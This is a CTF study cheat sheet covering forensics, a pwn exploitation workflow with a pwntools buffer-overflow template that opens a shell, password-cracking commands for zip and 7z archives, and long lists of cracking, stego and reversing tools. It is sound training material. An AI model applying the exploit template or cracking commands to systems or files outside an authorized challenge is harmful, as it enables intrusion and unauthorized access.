# FORENSICS

* Picture check:
  - Hex values:
    - First things first: check the signature (magic) bytes of the file format.
    - JPEG file: find the first `FF C0` bytes; skipping 3 bytes after them lands on the picture's height bytes.
    - PNG file: after the PNG signature bytes, skip the 4 bytes of `IHDR` and the 2 width bytes to see the 2 height bytes.
  - Hidden files:
    - `binwalk -e`: extract files hidden inside a picture.
    - `steghide extract -sf`: only for the special case where a steganography tool was used to hide files.

* Online tools
  - https://jwt.io/#debugger-io
  - https://gchq.github.io/CyberChef
  - https://www.dcode.fr/identifier
  - https://www.cmd5.org
  - https://hexed.it/
  - https://www.debuggex.com/
  - http://xor.pw/
  - https://passwordrecovery.io/zip-file-password-removal/

# Pwn Workflow

## 1. Classifying the Pwnable Challenge

Pwnable challenges usually fall into one of the following main groups:

| Challenge type | Signs | Main exploitation technique |
| --- | --- | --- |
| Buffer Overflow | Overly long input, buffer-overrun bugs, use of `gets()`, `strcpy()` | Stack overflow, ret2libc, ROP |
| Format String | `printf(user_input)` without `%s`, `%x`, `%n` | Address leak, GOT/PLT overwrite |
| Heap Exploitation | Program uses `malloc()`, `free()`; double-free bugs | Fastbin attack, UAF, House of * |
| ROP (Return Oriented Programming) | Shellcode cannot be executed directly (NX protection enabled) | ret2libc, ROP chain |
| GOT Hijacking | Has a GOT table but Full RELRO is not enabled | Overwrite a GOT entry to redirect execution |
| Privilege Escalation | Program runs as a normal user but contains `setuid(0)` | Privilege escalation, LFI, race condition |
| Kernel Exploitation | Has a kernel module or runs in a root environment | Kernel exploit, kernel stack overflow |

👉 Easy challenges usually show the following signs:

- Not many protection mechanisms enabled (NX, PIE, RELRO).
- Uses `gets()`, `strcpy()`, `scanf("%s")` (prone to buffer overflow).
- Prints the addresses you need (`puts()` can help leak libc addresses).
- No canary (`__stack_chk_fail` does not appear in the binary).
- Has a `system("/bin/sh")` function or other convenient functions.

## 2. Checking the Binary's Protections

Before exploiting, check which protection mechanisms the program has enabled:

### 2.1 Check with checksec

Run the following command to see the binary's protection mechanisms:

```bash
checksec --file=chall
```

The result may include:

- NX (No eXecute bit): if OFF, shellcode can be injected.
- PIE (Position Independent Executable): if OFF, the binary's addresses are fixed.
- RELRO (Relocation Read-Only): if Partial, the GOT can be overwritten.
- Canary: if OFF, a buffer overflow is easier to exploit.

### 2.2 Inspect with file

```bash
file chall
```

Check whether the binary is 32-bit or 64-bit, since this affects how it is exploited.

## 3. Analyzing the Program

You can use Ghidra, IDA Pro, Radare2, or objdump to analyze the code.

### 3.1 Identify the main functionality

```bash
strings chall      # view the strings in the binary
nm -C chall        # list the symbols and functions in the binary
objdump -d chall   # disassemble the binary
```

Look for dangerous functions such as:

- `system()`
- `gets()`, `scanf()`, `strcpy()`
- `printf(user_input)`

### 3.2 Identify the program's input

Test-run the program:

```bash
./chall
```

Use ltrace to trace function calls:

```bash
ltrace ./chall
```

Use gdb to debug:

```bash
gdb -q ./chall
```

## 4. Planning the Exploit

Based on the analysis above, decide how to exploit:

| Bug type | Exploitation method |
| --- | --- |
| Buffer Overflow (stack) | Overwrite EIP/RIP to control the execution flow |
| Format String | Leak libc addresses, overwrite the GOT |
| Heap Exploitation | Fastbin attack, House of * |
| ROP (Return Oriented Programming) | Build a ROP chain to call `system("/bin/sh")` |

## 5. Writing the Exploit

Use Pwntools to write the exploit script:

```python
from pwn import *

# Connect to the program
p = process("./chall")

# Payload that overflows the buffer
payload = b"A" * 40 + p64(0xdeadbeef)

# Send the payload
p.sendline(payload)

# Open a shell
p.interactive()
```
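For step 2 above, the facts checksec reports can also be read directly from the ELF headers. Added example, not part of the workflow's own script: word size from `e_ident`, PIE from `e_type == ET_DYN`, NX from the `PT_GNU_STACK` flags, and whether a `PT_GNU_RELRO` segment is present. Canary and Full RELRO need the symbol table and the dynamic section, so they are not covered here. The little-endian assumption, the function names and the constructed `build_sample_elf64` image are mine; pwntools' `ELF` class exposes the same facts as `.nx`, `.pie`, `.relro` and `.canary`.

```python
import struct

# ELF constants (ELF specification / Linux ABI)
ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFCLASS64 = 1, 2
ET_EXEC, ET_DYN = 2, 3
PT_GNU_STACK = 0x6474E551   # stack permissions; no PF_X bit means NX is on
PT_GNU_RELRO = 0x6474E552   # region made read-only after relocation
PF_X = 0x1


def elf_protections(data: bytes) -> dict:
    """Read word size, PIE, NX and the RELRO segment from the ELF headers.

    nx is None when the binary has no PT_GNU_STACK header at all; the loader
    then falls back to its default, so treat it as 'not proven'.
    Assumes a little-endian ELF (x86 / x86-64)."""
    if data[:4] != ELF_MAGIC:
        raise ValueError("not an ELF file")
    if data[5] != 1:
        raise ValueError("big-endian ELF not handled by this example")
    ei_class = data[4]
    if ei_class == ELFCLASS64:
        # e_ident, e_type, e_machine, e_version, e_entry, e_phoff, e_shoff,
        # e_flags, e_ehsize, e_phentsize, e_phnum, e_shentsize, e_shnum, e_shstrndx
        hdr = struct.unpack_from("<16sHHIQQQIHHHHHH", data, 0)
        bits, phdr_fmt, flags_index = 64, "<IIQQQQQQ", 1   # p_flags is the 2nd field
    elif ei_class == ELFCLASS32:
        hdr = struct.unpack_from("<16sHHIIIIIHHHHHH", data, 0)
        bits, phdr_fmt, flags_index = 32, "<IIIIIIII", 6   # p_flags is the 7th field
    else:
        raise ValueError("unknown ELF class %d" % ei_class)
    e_type, e_phoff, e_phentsize, e_phnum = hdr[1], hdr[5], hdr[9], hdr[10]

    nx, relro_segment = None, False
    for i in range(e_phnum):
        ph = struct.unpack_from(phdr_fmt, data, e_phoff + i * e_phentsize)
        p_type, p_flags = ph[0], ph[flags_index]
        if p_type == PT_GNU_STACK:
            nx = not (p_flags & PF_X)
        elif p_type == PT_GNU_RELRO:
            relro_segment = True
    return {"bits": bits, "pie": e_type == ET_DYN, "nx": nx,
            "relro_segment": relro_segment}


def check_file(path: str) -> dict:
    """Run elf_protections on a file from disk (e.g. the challenge's chall)."""
    with open(path, "rb") as f:
        return elf_protections(f.read())


def build_sample_elf64(stack_flags: int, e_type: int) -> bytes:
    """Constructed minimal ELF64 image: header plus one PT_GNU_STACK program
    header. It is not loadable; it only exercises the header checks above."""
    e_ident = ELF_MAGIC + bytes([ELFCLASS64, 1, 1, 0, 0]) + b"\x00" * 7
    ehdr = struct.pack("<16sHHIQQQIHHHHHH", e_ident, e_type, 0x3E, 1, 0x1000,
                       64, 0, 0, 64, 56, 1, 0, 0, 0)
    phdr = struct.pack("<IIQQQQQQ", PT_GNU_STACK, stack_flags, 0, 0, 0, 0, 0, 16)
    return ehdr + phdr


if __name__ == "__main__":
    # PF_R|PF_W (6) = non-executable stack; PF_R|PF_W|PF_X (7) = executable stack
    print(elf_protections(build_sample_elf64(6, ET_DYN)))   # PIE on, NX on
    print(elf_protections(build_sample_elf64(7, ET_EXEC)))  # PIE off, NX off
```

Run it on a real binary with `check_file("./chall")` and compare against `checksec --file=chall`; the two should agree on NX and PIE, while RELRO here only tells you whether a RELRO segment exists at all.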
## 6. Debugging and Finishing the Exploit

If it does not work yet, debug with GDB:

```bash
gdb -q ./chall
```

Important commands:

- `disas main` → disassemble the `main()` function
- `info functions` → list the functions
- `b *main+30` → set a breakpoint
- `run` → run the program
- `x/20gx $rsp` → view the stack

## 7. Checking and Submitting the Flag

After a successful exploit, the flag can be found with:

```bash
cat flag.txt
```

Or, if on the CTF server:

```python
p = remote("server_ip", 1337)
p.sendline(payload)
p.interactive()
```

## Summary

- 🔹 Step 1: Identify the pwnable type (Stack, Heap, Format String, ROP, Kernel).
- 🔹 Step 2: Check the protection mechanisms with checksec.
- 🔹 Step 3: Analyze the binary with Ghidra, IDA Pro, or objdump.
- 🔹 Step 4: Identify the bug and plan the exploit.
- 🔹 Step 5: Write the exploit script with Pwntools.
- 🔹 Step 6: Debug with GDB if needed.
- 🔹 Step 7: Exploit successfully and grab the flag! 🚀

# CTF Tools

This repository is a place where I want to keep all the useful *resources/websites/tools* to solve CTF challenges. All the tools will be divided by category, in order to have a better organization. This repo is for me but also for my CTF team, and why not for whoever will get to this page. It will contain even some "obvious" links, like the ASCII table and so on, because it is a page intended to be kept open during CTFs: you never know what will come in handy!

## Training 🚩

> A list of useful websites to train our skills and knowledge.
- [picoCTF](https://picoctf.org/)
- [capturetheflag](https://capturetheflag.it/risorse/come-imparo)
- [overthewire](https://overthewire.org/wargames/)
- [pwnable](http://pwnable.kr/)

## General 📋

#### Tools

- [John Hammond - Katana](https://github.com/JohnHammond/ctf-katana): **huge repo of very useful CTF tools**, thank you John, my repo now looks useless
- [Cyberchef](https://gchq.github.io/CyberChef/): huge tool to perform **every type of calculation of any category**
- [Hex Editor](https://hexed.it/): online **hex editor** for files
- [Online Converter](https://www.rapidtables.com/convert/number/ascii-hex-bin-dec-converter.html): **ASCII/Hex/Dec/Bin/b64 converter** tool online
- [XOR Calculator](http://xor.pw/)
- [Resource Saver](https://chrome.google.com/webstore/detail/save-all-resources/abpdnfjocnmdomablahdcfnoggeeiedb?hl=en-US): Chrome extension to **download all the resources of a website**
- [Github Secrets](https://github.com/neodyme-labs/github-secrets): search for **dangling or force-pushed commits** in a Github repo
- [Zip Password Cracker](https://passwordrecovery.io/zip-file-password-removal/): a really useful and free **online zip password finder**
- [Regex Check](https://www.debuggex.com/): check **regular expressions** online

#### Resources

- [ASCII Table](http://www.asciitable.com/)

## Cryptography 🔒

#### Tools

- [dCode](https://www.dcode.fr): **crypto heaven**
- [QuipQiup](https://quipqiup.com/): online **substitution cipher solver** with frequency analysis, also allows you to insert frequency hints
- [Big Numbers Calculator 1](http://www.javascripter.net/math/calculators/100digitbigintcalculator.htm): an online **calculator for huge integers**
- [Big Numbers Calculator 2](https://defuse.ca/big-number-calculator.htm): an online **calculator for huge integers**, worse UI but maybe better performance
- [RSA Calculator](https://www.cryptool.org/en/cto/highlights/rsa-step-by-step): online **RSA parameters calculator with encryption/decryption**, works also with big numbers
- [Inverse mod N Calculator](https://www.dcode.fr/modular-inverse): compute the **modular inverse of a number**, even with big numbers
- [RsaCtfTool](https://github.com/Ganapati/RsaCtfTool): Python tool to perform **RSA attacks**
- [FactorDB](http://factordb.com/): find **well-known integer factorizations**
- [CrackStation](https://crackstation.net/): online **hash cracker** (md5, sha, ...)
- [Vigenere Solver](https://www.guballa.de/vigenere-solver): very good online **Vigenere Cipher solver** with bruteforce
- [Substitution Solver](https://www.guballa.de/substitution-solver): very good online **Substitution Cipher solver** with bruteforce
- [Sage Math](https://sagecell.sagemath.org/): online Sage environment to **perform Crypto calculations**
- [Crunch](https://tools.kali.org/password-attacks/crunch): Linux tool to **create custom dictionaries** for attacks (hash, pwd, ..)
- [Online Hash Crack](https://www.onlinehashcrack.com/): big website to **perform hash/pwd cracking and identification** on various files
- [Hash Identifier](https://tools.kali.org/password-attacks/hash-identifier): Linux tool to **perform hash identification**
- [Morse Code Translator](https://morsecode.world/international/translator.html)
- [Dual Tone Decoder](http://dialabc.com/sound/detect/): find **DTMF tones** within audio clips
- [gmpy2](https://gmpy2.readthedocs.io/en/latest/intro.html): Python library for **multiple-precision arithmetic**

#### Resources

- [Weird Ciphers](http://www.quadibloc.com/crypto/intro.htm): a list of some **strange cryptography algorithms**
- [Symbolic Ciphers](https://www.dcode.fr/symbols-ciphers): another list of **strange cryptography algorithms**

## Steganography 🎨

#### Tools

- [Aperi'Solve](https://aperisolve.fr/): **one of the best online tools**, with static analysis and also running zsteg, steghide, exiftool, binwalk, foremost, ..
- [StegOnline](https://stegonline.georgeom.net): big stego tool, upload an image and **modify/extract data**
- [Stegsolve](https://github.com/eugenekolo/sec-tools/tree/master/stego/stegsolve/stegsolve): JAR file to view **hidden text in images**
- [Steg 1](https://stylesuxx.github.io/steganography/): online **encoder/decoder of files in images**
- [Steg 2](https://futureboy.us/stegano/decinput.html): online **encoder/decoder of files in images**, maybe more powerful
- [Images Color picker](https://imagecolorpicker.com/): get **colors from websites/images in Hex/RGB**
- [Stegseek](https://github.com/RickdeJager/stegseek): lightning fast **steghide cracker** that can be used to extract hidden data from files.

#### Resources

- [steghide](http://steghide.sourceforge.net/documentation/manpage.php): manual website of the **Steghide** tool
- [zsteg](https://github.com/zed-0xff/zsteg): Ruby tool for steganography purposes

## Web 🕸️

#### Tools

- [CSP Evaluator](https://csp-evaluator.withgoogle.com/): Google **CSP evaluator** with bypass possibilities
- [Subdomain Finder](https://subdomainfinder.c99.nl/index.php): website to **find subdomains of URLs**, even hidden ones
- [Google Certificates](https://transparencyreport.google.com/https/certificates): search certificates of a website by domain
- [Traversal Archives](https://github.com/jwilk/traversal-archives): samples of archive files in various formats that attempt to exploit (hypothetical) directory traversal bugs

#### Resources

- [CSP Cheatsheet](https://six2dez.gitbook.io/pentest-book/enumeration/web/csp): list of **CSPs and relative bypass** possibilities
- [JSONP Endpoints](https://github.com/zigoo0/JSONBee/blob/master/jsonp.txt): list of **well-known JSONP Endpoints**
- [Web Payloads](https://github.com/swisskyrepo/PayloadsAllTheThings): list of **Web Payloads** of various techniques

## Pwn 🐛

### Tools

- [Syscall Reference](https://syscalls.w3challs.com/): **x86 / x64 syscalls manual** with register values
- [Asm/Disasm](https://defuse.ca/online-x86-assembler.htm#disassembly): online **x86 / x64 assembler and disassembler**
- [LibC Check](https://libc.blukat.me/?q=puts%3A0x7f51bf2ee9c0&l=libc6_2.27-3ubuntu1_amd64): find all the **possible libc versions** with symbol name and entry address
- [BinaryNinja](https://cloud.binary.ninja/): online **binary file decompiler**
- [DogBolt](https://dogbolt.org/): online **binary file decompiler** with different options like Ghidra and BinaryNinja

### Resources

## Forensics 🕵️‍♂️

### Tools

- [Forensically](https://29a.ch/photo-forensics/#forensic-magnifier): **online forensic analysis tool** to extract cool data from images, ..
- [Autopsy](https://www.sleuthkit.org/autopsy/): **file recovery tool** with data carving, ..
- [Foremost](https://tools.kali.org/forensics/foremost): **file recovery tool** based on magic bytes, headers, ..

### Resources

## OSINT 🌐

- [Mail from LinkedIn](https://skrapp.io/tutorials/linkedin-email-finder): Chrome extension to **find email addresses from a LinkedIn page**
- [Wayback Machine](https://archive.org/web/): **webpage archive at a certain time**
- [Sherlock](https://github.com/sherlock-project/sherlock): hunt down **social media accounts by username**
- [Email lookup](https://epieos.com/): tool to **retrieve information linked to an email address**

## Reversing ↩️

### Tools

- [Online Decompiler](http://www.javadecompilers.com/): online tool to decompile **Java classes, APKs,...**
- [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF): tool to **decompile and reverse APK** files
- [JADX](https://github.com/skylot/jadx): tool for producing Java source code from **Android Dex and APK** files
- NB: `strings` is useful also on APK files

# ANOTHER TIPS

## Operating System

*Useful OS*

To master CTF, you should be familiar with using a Linux OS. Linux is very good in the cyber security field: there are a lot of CTF tools pre-installed in Linux. My suggestion is to start playing with Kali Linux.
Kali Linux is an advanced penetration testing Linux distribution used for penetration testing, ethical hacking and network security assessments. For me, I use both Kali Linux and Windows because some tools are easier to play with in a Windows environment and some are not. Using VirtualBox will ease your work better than running dual boot. But note here: a virtual machine may be heavy and need a lot of memory on a low-spec laptop/machine.

Suggested virtual machines:

- Kali Linux - Linux-based penetration testing OS
- Flare-VM - Windows-based malware analysis lab
- Commando-VM - Windows-based offensive security lab
- Ninjutsu-OS - Windows-based offensive security lab

## Basic

*Basic things a beginner needs to master*

- When the CTF organizer gives you a binary (download file), always run the command `file [filename]` on the binary. The `file` command will determine what type of file you have downloaded: it checks the magic number or file signature in the binary header. Learn more about file signatures here. Some challenge creators will confuse you by changing or removing the extension of a binary. Example: the actual binary is `binary.jpg` but they changed it to `binary.exe`, so the CTF player will think that it is an executable file instead of an image/jpeg file.
- Run `strings -a [filename]` to extract the strings in the given binary. Some clues or artifacts can be found in the strings output.
- Base64 is the common encoding used in CTF. Learn about its characteristics and how to decode it. One online tool that can help you is this site. But the better approach is to decode encoded strings using Linux's terminal, because some base64-encoded data may be a binary file. If it is a binary file, an online tool like the one in the link can't give you the decoded binary file: it can only decode strings, not binary files. Example of the Linux command for base64: `echo "[strings of the base64]" | base64 -d`.
- Learn about number encoding: hexadecimal, binary, decimal and also ASCII. You can use this website to convert your strings between them.

## Cryptography

*Scrambled and encrypted text*

Whatever happens, Google is your friend. There are a lot of cryptography tools online. Some good tools are made for offline use, like OpenSSL.

### Classic cipher / simple decoder online tools

- https://quipqiup.com - quipqiup is a fast and automated cryptogram solver
- https://www.base64decode.org/ - base64 decoder
- https://www.urldecoder.org/ - URL decoder
- https://emn178.github.io/online-tools/base32_decode.html - Base32 decoder
- https://cryptii.com/ - All in one tool
- https://www.guballa.de/substitution-solver - Substitution solver
- https://www.guballa.de/vigenere-solver - Vigenere solver
- https://rot13.com/ - Rot 1 - 25 decryptor
- https://www.dcode.fr - All in one tool
- http://rumkin.com/tools/cipher/ - All in one tool
- http://www.unit-conversion.info/texttools/morse-code/ - Morse code decoder
- https://cryptii.com/pipes/ascii85-encoding - ASCII85 decoder
- https://github.com/Ciphey/Ciphey - Ciphey

### Modern cryptography

- https://gchq.github.io/CyberChef/ - All in one tool
- https://crackstation.net/ - Crack hash
- Cryptool
- John the Ripper
- Hashcat

### OpenSSL cheatsheet

Decrypt a file using an RSA private key:

```bash
openssl rsautl -decrypt -inkey pub_priv.key -in ciphertext.file -out decrypted.file
```

Decrypt a file using AES-256-CBC and a keyfile:

```bash
openssl enc -d -aes-256-cbc -in ciphertext.file -out cleartext.file -pass file:./key.file
```

Decrypt a file using AES-256-CBC:

```bash
openssl enc -aes-256-cbc -d -in file.txt.enc -out file.txt
```

Decrypt a base64-encoded file using AES-256-CBC:

```bash
openssl enc -aes-256-cbc -d -a -in file.txt.enc -out file.txt
```

Other reference: https://gist.github.com/dreikanter/c7e85598664901afae03fedff308736b#file-encrypt_openssl-md

### Cracking compressed files

- John the Ripper - `john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt`
- fcrackzip - `fcrackzip -D -u -p rockyou.txt filename.zip`

Note: Sometimes there are challenges that require you to develop your own decryptor for that particular challenge. Just make sure you have a good scripting/programming language to solve the challenges.

## Steganography

*A method of hiding something inside something else.*

### General

- Usually when the organizer gives us an Image, Music, Video, Zip, EXE, File System, PDF or other file, it is a steganography or forensics challenge.
- Run the `file` command first.
- Metadata is important. Check out the EXIF data of the file by using the `exiftool [filename]` command.
- Try issuing `binwalk [filename]` on the file. They may hide another file in the file. To extract, use `binwalk -e`. To extract one specific signature type, use `binwalk -D 'png image:png' [filename]`. To extract all files, run `binwalk --dd='.*' [filename]`.
- Try file carving using the `foremost -v [filename]` command. Foremost supports all files.

### Images

- View the image first.
- Use the `strings` command on that file. Try `grep -i [any strings you want to filter]` on the strings command output. Example: `grep -i "flag{"` to filter for the flag format only. The `-i` option disables case sensitivity.
- Google the image and compare the md5 hash. If you find the same image but with a different md5 hash, it has probably been altered.
- Analyse the header and the content of the file using any hex editor. Know the file signature. Maybe they gave us a corrupt header! So fix it!
- Maybe the zoom-in and zoom-out method can get the flag.
- Use https://www.tineye.com/ to reverse-search the image on the internet.
- Use the `imagemagick` command-line tool to do image manipulation.
- Use the Stegsolve.jar tool. There are so many CTFs I've participated in where I used this tool to unhide a flag from an image.
- File carve using `steghide --extract -sf <filename>`. Try to find the password yourself. Maybe the organizer will give hints, or the password may be in another file.
- Check for any corruption in a PNG file by using the `pngcheck <filename.png>` command.
- Detect stegano-hidden data in PNG & BMP files by issuing `zsteg -a <filename.png>`.
- Use SmartDeblur software to fix blur in an image.
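The picture check at the top of this page (signature bytes, then the height bytes after `FF C0` in a JPEG or after `IHDR` in a PNG), the `file`/renamed-extension and base64 notes in the Basic section, and the header and pngcheck items just above all come down to reading a few bytes. Added example, not the page's own code: a small Python checker that sniffs the type by magic, flags an extension that disagrees with it, decodes base64 to raw bytes before sniffing, walks PNG chunks verifying every CRC the way pngcheck does, and reads JPEG dimensions from the first SOF segment. The sample files are constructed inside the block; `sniff`, `inspect_blob` and the other names are my choices.

```python
import base64
import re
import struct
import zlib

# Leading bytes (magic numbers) for formats that show up in challenges
MAGIC = [
    (b"\x89PNG\r\n\x1a\n", "png"), (b"\xff\xd8\xff", "jpeg"),
    (b"GIF89a", "gif"), (b"GIF87a", "gif"), (b"PK\x03\x04", "zip"),
    (b"%PDF-", "pdf"), (b"\x7fELF", "elf"), (b"MZ", "pe"),
]
PNG_SIGNATURE = MAGIC[0][0]


def sniff(data: bytes) -> str:
    """Identify a blob by its magic bytes, like `file`, ignoring the name."""
    for magic, name in MAGIC:
        if data.startswith(magic):
            return name
    return "data"


def extension_mismatch(filename: str, data: bytes) -> bool:
    """True when the extension disagrees with the magic (a binary.exe that is a JPEG)."""
    ext = filename.rsplit(".", 1)[-1].lower()
    aliases = {"jpg": "jpeg", "exe": "pe", "dll": "pe"}
    return aliases.get(ext, ext) != sniff(data)


def decode_base64_blob(text: str) -> bytes:
    """Decode base64 that may carry a binary file: strip whitespace, restore
    padding, return raw bytes (what `base64 -d` gives you, not a string)."""
    cleaned = re.sub(rb"\s+", b"", text.encode("ascii"))
    cleaned += b"=" * (-len(cleaned) % 4)
    return base64.b64decode(cleaned, validate=True)


def png_info(data: bytes) -> dict:
    """Walk PNG chunks (length, type, data, CRC) verifying each CRC, and read
    width/height from IHDR (4 bytes each, big-endian)."""
    if not data.startswith(PNG_SIGNATURE):
        raise ValueError("not a PNG")
    info = {"width": None, "height": None, "bad_chunks": []}
    pos = len(PNG_SIGNATURE)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack_from(">I4s", data, pos)
        name = ctype.decode("latin-1")
        if pos + 12 + length > len(data):          # chunk runs past end of file
            info["bad_chunks"].append(name + " (truncated)")
            break
        body = data[pos + 8: pos + 8 + length]
        (crc,) = struct.unpack_from(">I", data, pos + 8 + length)
        if zlib.crc32(ctype + body) & 0xFFFFFFFF != crc:
            info["bad_chunks"].append(name)
        if ctype == b"IHDR":
            info["width"], info["height"] = struct.unpack_from(">II", body, 0)
        pos += 12 + length
        if ctype == b"IEND":
            break
    return info


def jpeg_size(data: bytes) -> tuple:
    """Walk JPEG marker segments to the first SOF marker (FF C0..C3) and read
    height then width: they follow the 2-byte length and 1-byte precision, so
    height sits 3 bytes after the marker, as the picture check above says."""
    if not data.startswith(b"\xff\xd8"):
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError("marker expected at offset %d" % pos)
        marker = data[pos + 1]
        if 0xC0 <= marker <= 0xC3:                  # SOF0..SOF3
            height, width = struct.unpack_from(">HH", data, pos + 5)
            return width, height
        (seg_len,) = struct.unpack_from(">H", data, pos + 2)
        pos += 2 + seg_len
    raise ValueError("no SOF segment found")


def inspect_blob(data: bytes) -> dict:
    """Type by magic, then format-specific header facts."""
    result = {"type": sniff(data)}
    if result["type"] == "png":
        result.update(png_info(data))
    elif result["type"] == "jpeg":
        result["width"], result["height"] = jpeg_size(data)
    return result


def _png_chunk(ctype: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


# Constructed samples (not from any challenge): a 640x480 PNG skeleton, the
# same with the low height byte in IHDR zeroed, and a 320x240 JPEG skeleton.
SAMPLE_PNG = (PNG_SIGNATURE
              + _png_chunk(b"IHDR", struct.pack(">IIBBBBB", 640, 480, 8, 2, 0, 0, 0))
              + _png_chunk(b"IEND", b""))
CORRUPT_PNG = SAMPLE_PNG[:23] + b"\x00" + SAMPLE_PNG[24:]
SAMPLE_JPEG = (b"\xff\xd8"
               + b"\xff\xe0" + struct.pack(">H", 16) + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
               + b"\xff\xc0" + struct.pack(">H", 11) + b"\x08" + struct.pack(">HH", 240, 320) + b"\x01\x01\x11\x00"
               + b"\xff\xd9")
SAMPLE_PNG_B64 = base64.b64encode(SAMPLE_PNG).decode()
```

`inspect_blob(open(path, "rb").read())` is the whole workflow on a downloaded file; a non-empty `bad_chunks` list on a PNG is the "corrupt header, so fix it" case, and `extension_mismatch` catches the renamed-binary trick before you waste time on the wrong tool.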
### More image tools

- Use the `stegcracker <filename> <wordlist>` tool, a steganography brute-force password utility to uncover hidden data inside files.
- Use tesseract to scan text in an image and convert it to a .txt file.
- Another powerful tool is called zsteg.
- Steganosuite: extract data from an image (`-x`).

Some online stegano decoders:

- https://futureboy.us/stegano/decinput.html
- http://stylesuxx.github.io/steganography/
- https://www.mobilefish.com/services/steganography/steganography.php
- https://manytools.org/hacker-tools/steganography-encode-text-into-image/
- https://steganosaur.us/dissertation/tools/image
- https://georgeom.net/StegOnline
- http://magiceye.ecksdee.co.uk/

### Compressed files

- Unzip it.
- Use the `zipdetails -v` command to display details about the internal structure of a Zip file.
- Use the `zipinfo` command for detailed info about a Zip file.
- Use `zip -FF input.zip --out output.zip` to attempt to repair a corrupted zip file.
- Brute-force the zip password using `fcrackzip -D -u -p rockyou.txt filename.zip`.
- To crack 7z, run `7z2hashcat32-1.3.exe filename.7z`, then `john --wordlist=/usr/share/wordlists/rockyou.txt hash`.

### Music files

- Use binwalk first. They may have embedded something in the file.
- Use Audacity.
- Use Sonic Visualiser. Look at the spectrogram and the other few panes.
- Use Deepsound.
- Use SilentEye.

Some online stegano decoders for music:

- https://steganosaur.us/dissertation/tools/audio

### Text

- Use http://www.spammimic.com/, which can decode a message hidden in spam text.

### PDF

- qpdf
- PDFStreamdumper
- pdfinfo
- pdfcrack
- pdfimages
- pdfdetach
- `pdf-parser.py -v <file>`
- pdftotext
- `peepdf -if <filename>`, then `object <value>`
- pdfid

## Digital Forensics

Usually the organizer will give us a digital image: a memory dump like .raw, a disk image like .e01, and a few others.

- Always issue the `file <filename>` command on whatever file you get first! If the result of the `file` command is only "data", you must try harder to find the right tool to carve the information contained in the file.
- Check out the EXIF data of the file by using the `exiftool <filename>` command.
- Run `strings` for clues.
- Try file carving using the `foremost <filename>` command. Foremost supports all files, but it takes time to extract everything when you face a big file.

Common locations for various artifacts:

- Web: browsing history, cookies, cache files and others.
- Windows OS: registry, event logs and others.
- Linux: configuration files, log files and others.
- Mobile phones: app data and others.
- Many more!

Tools:

- Volatility. It's a memory extraction utility framework for memory forensics. Use this as your Volatility command reference.
- Redline. Another alternative to Volatility. But Volatility is the best for me.
- Bulk-extractor software. It can extract features such as email addresses, credit card numbers, URLs, and other types of information from digital evidence files.
- FTK Imager. FTK Imager is a data preview and imaging tool that allows you to examine files and folders on local hard drives, network drives, CDs/DVDs, and review the content of forensic images or memory dumps.
- Use Autopsy, ProDiscover or EnCase software; they function like FTK Imager.
- Use `e2fsck [mnt image]` to fix a corrupt filesystem (ext3 and ext4).
- Recover files using Recuva. They may give you an image that you can mount on your machine using FTK Imager. So, go to the drive and try to recover the files you want.
- RegRipper for registry analysis.
- Mastering Windows Event Viewer will give you a plus.

Useful tools for scanning event logs:

- DeepBlueCLI
- Chainsaw
- WELA
- Hayabusa
- APTHunter

## Reverse Engineering

*The art of code analysis: analysing the inner workings of code.*

Note: This challenge is quite hard for beginners. This checklist does not fully cover everything in RE, and it will not be applicable if you don't have the foundation to play with reverse engineering.

- Whenever you get a file, issue the `file` command on it first to know what file it really is.
- Use the `strings <filename>` command to read the strings in the binary and find some clues. Maybe some `grep -i` commands too.
- You need to be strong in C, assembly language and computer architecture for this challenge!
- Most CTF reversing requires scripting if it involves encryption etc. It may be solvable using a debugger.
- Usually they give a binary file. Whether it is a...
  - PE file (.exe or .dll)
  - ELF file (elf)
  - APK file (apk)
  - .NET file (exe)
  - Java file
  - Python file (pyc or py)

### PE file

- Use DIE, PEiD, PEBear, or PEView software to do static file analysis. Find details of the file in there!
- Use HxD to check the file header and file signature. Maybe the file signature is the corrupt one.
- Find out whether it is packed or not. Find an online unpacker.
- Find out whether the binary has anti-debug or not.
- Use IDA Pro software to perform static analysis on the binary. When doing static or dynamic analysis, focus on strcmp, function calls and conditional jumps.
- You can use Snowman or Ghidra software as a decompiler.
- Use a debugger like Immunity Debugger, x64dbg/x32dbg, or WinDbg to debug the binary.
- API Monitor
- frida-trace

### ELF

- Use the `ltrace ./<filename>` command to know what library functions are being called in the binary.
- Use the `strace ./<filename>` command to know what system calls and signals are being used by the binary.
- Use the `nm <filename>` command to know what symbols are referenced in the binary.
- Use the `readelf -a <filename>` command. It displays information about ELF files.
- Use a gdb debugger extension: PEDA, pwndbg or GEF will help you! Or you can use the edb debugger.
- Use IDA Pro software to perform static analysis on the binary.

### APK file

- Use the `apktool <filename>` command-line tool.
- Use an Android emulator to run the program.
- Use Android Debug Bridge.
- Use the `dex2jar <filename>` command-line tool.
- Use jd-gui. JADX is a good alternative to jd-gui.
- Rename the file to a zip file. Unzip it. Take a look at the files in your favorite text editor.

### .NET file

- Use dnSpy software. Very powerful. You can recompile the program via Edit in the main interface -> Compile -> Save All. Try running the program again!
### Java file

- Use JADX

### Python file

- There are many options; one of them is uncompyle6. Just google for a Python decompiler.
- https://github.com/extremecoders-re/pyinstxtractor - Python EXE to pyc

### Shellcode

- scdbg
- shellcode2exe
- PDFStreamDumper shellcode analysis debugger
- IDA Pro
- unicode2hex-escaped
- HxD

### Others

- https://www.decompiler.com/ - EXE or DLL (C#), JAR or CLASS, APK, XAPK or DEX, PYC or PYO, LUAC or LUB, SMX or AMXX

## Binary Exploit / Pwn

*Exploit program vulnerabilities*

Note: Usually they give us a binary and the source code of the binary.

- Whenever you get a file, issue the `file` command on it first to know what file it really is.
- You need to be strong in assembly language, computer architecture, C programming (reverse engineering) and Python to write scripts for this challenge!
- Run `checksec` to check the security properties of the executable:
  - Stack Canaries = a secret value placed on the stack which changes every time the program is started. The stack canary is checked and, if it appears to have been modified, the program exits immediately.
  - NX = stored input or data cannot be executed as code.
